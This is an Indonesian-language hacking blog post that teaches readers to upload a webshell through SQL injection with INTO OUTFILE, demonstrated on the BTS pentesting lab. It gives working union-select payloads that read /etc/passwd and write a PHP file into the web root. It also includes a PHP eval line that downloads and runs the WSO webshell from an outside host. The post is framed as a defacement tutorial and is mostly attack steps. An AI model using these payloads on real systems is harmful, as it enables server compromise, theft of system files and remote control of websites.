Author : UnknownTidak ada komentar
Upload Shell With SQL Injection ( SQL Injection Into OUTFILE)
SQL Injection Into OUTFILE Upload shell tanpa mencari login admin...sempat" menulis lagi di blog hehehe dari pada bosen gak ngapain" mending buat tutor ... sudah jarang masuk di dunia hacking karena sibuk di dunia nyata...
tapi insyaallah saya akan sempat share tutor ...
*Pastikan kalian sudah mengerti deface sql manual kalo belum lihat post sebelumnya
Deface SQL Manual
ohh ya jika kalian butuh tools" kunjungin juga blog pencari receh :'v
404Hacking
TOols
kali ini saya pakai bts pentesting lab, karena males cari live target
pastikan kalian sudah di posisi seperti ini lalu di angka 3 ganti dengan
load_file('/etc/passwd') ,
localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,load_file('/etc/passwd'),4--+HEX : load_file(0x2f6574632f706173737764)
jika tidak keluar isi dalam perutnya skip aja bro tapi kalau mau tahu isi usernya bisa lihat di target,com/phpinfo.php
karena gw pakai web kaya gini gak bakal keluar lah ya kampang :'v
lalu sekarang untuk mengupload shellnya jika sudah ketemu user langsung go aja keburu kuota gw habis ye
localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,'Daffa Haxor',4 into outfile 'D:/USBWebserver v8.6/root/btslab/vulnerability/uploads/daffahaxor.php'--+
kalo seperti berhasil ya fans... sekarang kita coba buka daffahaxor.php &....
sekarang saya pakai teknik memanggil script & kode seperti ini
<?php eval("?>".file_get_contents("http://www.w0rms.com/down/wso.txt"));?>
lalu result seperti ini
terimah kasih sudah melihat tutor jika ada yang bingung tanya ke FB Daffa Haxor klo gak di bales ya lu chat aja ke fanspage :'v
Artikel Terkait
Posted On : Sabtu, 11 November 2017Time : November 11, 2017